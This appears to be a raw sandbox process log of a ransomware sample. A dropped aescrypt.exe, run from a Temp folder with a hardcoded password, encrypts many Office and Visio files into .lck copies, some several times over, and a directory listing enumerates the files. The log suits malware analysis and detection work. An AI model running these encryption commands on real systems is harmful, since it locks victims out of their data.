C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
3⤵
PID:1352

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
3⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
3⤵
PID:988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
3⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
3⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
3⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
3⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
3⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
3⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck" "SwitchOut.mhtml.lck.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck" "ShowMount.vsdx.lck.lck"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck" "ExpandInitialize.dotm.lck.lck"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck" "RequestSave.vsdm.lck.lck"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck" "PublishConnect.vdw.lck.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck" "WatchStart.docm.lck.lck"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck" "InvokeSubmit.doc.lck.lck"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
3⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck" "FindSet.mhtml.lck.lck"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
3⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
3⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck" "ResolveResize.vsw.lck.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck" "SaveWatch.vsw.lck.lck"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck" "ResumeClose.pptx.lck.lck"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck" "UninstallGet.xls.lck.lck"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck" "MoveComplete.vdx.lck.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck" "CloseRevoke.xls.lck.lck"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
3⤵
PID:1276
